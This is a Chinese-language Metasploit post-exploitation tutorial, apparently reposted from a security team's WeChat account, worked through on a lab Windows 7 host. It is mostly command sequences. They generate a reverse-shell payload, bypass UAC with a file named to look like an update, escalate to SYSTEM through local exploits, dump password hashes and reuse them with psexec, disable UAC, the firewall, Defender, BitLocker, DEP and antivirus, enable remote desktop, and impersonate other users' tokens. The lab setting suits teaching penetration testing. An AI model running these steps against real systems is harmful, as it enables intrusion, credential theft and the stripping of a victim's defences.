metasploit framework——后渗透阶段

admin
admin
admin
102258
文章
87
评论
2022年12月6日17:37:36评论33 views字数 4783阅读15分56秒阅读模式


metasploit framework——后渗透阶段


前言

在获取shell后,需要扩大战果

  • 提权

  • 信息收集

  • 渗透内网

  • 永久后门

内容有点多,分了几天学完

1、准备

攻击机kali
IP:192.168.1.119

目标机win7
IP:192.168.1.118

2、提权

基于已有session

#生成payloadmsfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.119 LPORT=4444 -b "x00" -e x86/shikata_ga_nai -f exe -o payload.execp payload.exe /var/www/html/service apache2 start#侦听service postgresql startmsfconsolemsf > use exploit/multi/handlermsf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcpmsf exploit(multi/handler) > set LHOST 192.168.1.119msf exploit(multi/handler) > exploit -j#win7浏览器192.168.1.119/payload.exe,执行后,kali获取shell#打开sessionmsf exploit(multi/handler) > sessions -i 1 [*] Starting interaction with 1...meterpreter > getuid Server username: WIN7-VMJohn#尝试提权meterpreter > load priv [-] The 'priv' extension has already been loaded.meterpreter > getsystem  [-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted: [-] Named Pipe Impersonation (In Memory/Admin) [-] Named Pipe Impersonation (Dropper/Admin) [-] Token Duplication (In Memory/Admin)meterpreter > background#提权失败,一般是由于 UAC 限制


绕过UAC

用ask模块绕过UAC,是让win7用户来同意

msf > use exploit/windows/local/askmsf exploit(ask) > set payload windows/meterpreter/reverse_tcpmsf exploit(ask) > set LHOST 192.168.1.119msf exploit(ask) > set FILENAME win_update.exe #取个欺骗性名字msf exploit(ask) > set SESSION 2 #设定sessionmsf exploit(ask) > exploit#win7用户点击yesmeterpreter > getuidmeterpreter > load privmeterpreter > getsystem#成功获取system权限

还有bypassuac可以用

msf > use exploit/windows/local/bypassuacmsf exploit(bypassuac) > set SESSION 1msf exploit(bypassuac) > set payload windows/meterpreter/reverse_tcpmsf exploit(bypassuac) > set LHOST 192.168.1.119msf exploit(bypassuac) > show targetsmsf exploit(bypassuac) > exploit#直接绕过UACmeterpreter > getuidmeterpreter > load privmeterpreter > getsystem#成功获取system权限


利用漏洞直接提权为 system

msf > use exploit/windows/local/ms13_053_schlampereimsf exploit(ms13_053_schlamperei) > set payload windows/meterpreter/reverse_tcpmsf exploit(ms13_053_schlamperei) > set SESSION 1msf exploit(ms13_053_schlamperei) > set LHOST 192.168.1.119msf exploit(ms13_053_schlamperei) > exploitmeterpreter > getuid#直接就是system权限

还有模块诸如ms13_097_ie_registry_symlink、ms13_081_track_popup_menu、ppr_flatten_rec
不一定能成功

图形化 payload

msf > use exploit/windows/local/ppr_flatten_recmsf exploit(ppr_flatten_rec) > set payload windows/meterpreter/reverse_tcpmsf exploit(ppr_flatten_rec) > set SESSION 1msf exploit(ppr_flatten_rec) > set LHOST 192.168.1.119msf exploit(ppr_flatten_rec) > set ViewOnly falsemsf exploit(ppr_flatten_rec) > exploit#相当于远程桌面了

3、用户登录

#获取用户和密码hashmeterpreter > load privmeterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: John:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::#关闭UACmsf > sessions -i 2 #用前面得到system权限的sessionmeterpreter > shell #打开shellC:Windowssystem32>cmd.exe /k %windir%System32reg.exe ADD HKLMSOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem /v EnableLUA /t REG_DWORD /d 0 /f #用reg创建键值C:Windowssystem32>cmd.exe /k %windir%System32reg.exe ADD HKLMSOFTWAREMicrosoftWindowsCurrentVersionPoliciessystem /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f #成功关掉UACC:Windowssystem32>shutdown -r -t 0 #重启#尝试利用msf > use exploit/windows/smb/psexecmsf exploit(psexec) > set RHOST 192.168.1.118msf exploit(psexec) > set SMBUser Johnmsf exploit(psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0msf exploit(psexec) > set payload windows/meterpreter/reverse_tcpmsf exploit(psexec) > set LHOST 192.168.1.119msf exploit(psexec) > exploit


4、关闭各种防护

msf > sessions -i 2 #用前面得到system权限的sessionmeterpreter > shell #打开shell#关闭防火墙,需要管理员或system权限C:Windowssystem32>netsh advfirewall set allprofiles state on #打开C:Windowssystem32>netsh advfirewall set allprofiles state off #关闭#关闭 windefendC:Windowssystem32>net stop windefend#bitlocker磁盘加密,强度极大C:Windowssystem32>manage-bde -off C:C:Windowssystem32>manage-bde -status C:#关闭 DEPC:Windowssystem32>bcdedit.exe /set {current} nx AlwaysOff#杀死防病毒软件C:Windowssystem32>exitmeterpreter > run killavmeterpreter > run post/windows/manage/killav

5、开启远程桌面服务

meterpreter > run post/windows/manage/enable_rdpmeterpreter > screenshot #截图meterpreter > use espia meterpreter > screengrab #也可以用这个截图rdesktop 192.168.1.118 #开启远程桌面

6、tokens

用户每次登录,账号绑定临时的tokens
访问资源时提交 tokens 进行身份验证,类似于 web cookies

  • delegate tokens:交互登录会话

  • impersonate tokens:非交互登录会话

  • delegate tokens账号注销后变为 Impersonate Token,权限依然有效

Incognito

独立功能的软件,被 msf 集成在 metepreter 中
无需密码或破解或获取密码 hash,窃取 tokens 将自己伪装成其他用户
尤其适用于域环境下提权渗透多操作系统

meterpreter > load incognitometerpreter > list_tokens -umeterpreter > impersonate_token labadministratoruse exploit/windows/local/ms10_015_kitrap0dmeterpreter > execute -f cmd.exe -i -t #-t:使用当前假冒tokens执行程序meterpreter > shell

结语

主要是学习渗透后如何扩大战果,还有两三次内容





   红客突击队于2019年由队长k龙牵头,联合国内多位顶尖高校研究生成立。团队从成立至今多次参加国际网络安全竞赛并取得良好成绩,积累了丰富的竞赛经验。红客突击队始终秉承先做人后技术的宗旨,旨在打造国际顶尖网络安全团队。其核心团队于2022年转型于信息安全研究院,并为政企提供安全服务与技术支持。


© Honker Security Commando


原文始发于微信公众号(中龙 红客突击队):metasploit framework——后渗透阶段

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年12月6日17:37:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   metasploit framework——后渗透阶段http://cn-sec.com/archives/1447656.html

发表评论

匿名网友 填写信息